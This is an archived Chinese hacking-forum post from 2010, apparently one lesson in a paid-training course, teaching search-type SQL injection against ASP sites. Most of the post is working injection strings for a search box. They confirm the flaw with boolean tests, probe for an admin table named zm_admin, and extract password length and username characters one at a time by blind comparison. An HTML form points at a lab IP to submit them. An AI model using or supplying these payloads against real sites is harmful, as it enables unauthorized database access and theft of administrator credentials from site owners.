脚本渗透第二十九课:asp搜索型注入-网安技术_NB5牛论坛

tygv726 发表于 2010-12-30 23:04:17

脚本渗透第二十九课:asp搜索型注入

饭客网络一周年免费培训之脚本渗透第二十九课:asp搜索型注入
www.hackfans.com.cn
饭客网络安全培训基地
中国最大的网络安全培训
只做网络安全信息安全方面的培训
宗旨：坚持宣传信誉实力回报
专业培训网络信息安全人才成就中国网络安全边防军团
--------------------------------------------------------------------------------
教程名称:asp搜索型注入

讲师:I.n.c゛啵、 QQ:380547774

测试%' and 1=1 and '%'=' //1=1返回找到一个，即正常
测试%' and 1=2 and '%'=' //1=2显然不成立，找不到任何文章，即返回异常
测试%' and (select count(pass) from zm_admin) and '%'='//返回正常说明存在zm_admin表
存在name和pass
测试%' and (select top 1 len(pass) from zm_admin)>1 and '%'='

测试%' and (select top 1 asc(mid(name,4,1)) from zm_admin)>96 and '%'='
admin admin

--------------------------------------------------------
<html>
<form name="form1" method="post" action="http://192.168.1.102/search.asp">
类型：
<label>
<input name="t" type="text" id="t" value="1">
</label>
<p>
内容：
<label>
<input name="key" type="text" id="key">
</label>
</p>
<p>
<label>
<input type="submit" name="Submit" value="提交">
</label>
</p>
</form>

教程下载地址：
http://www.hackfans.com.cn/mianfei/jiaoben/jb29rar

页: [1]

NB5牛论坛's Archiver

脚本渗透第二十九课:asp搜索型注入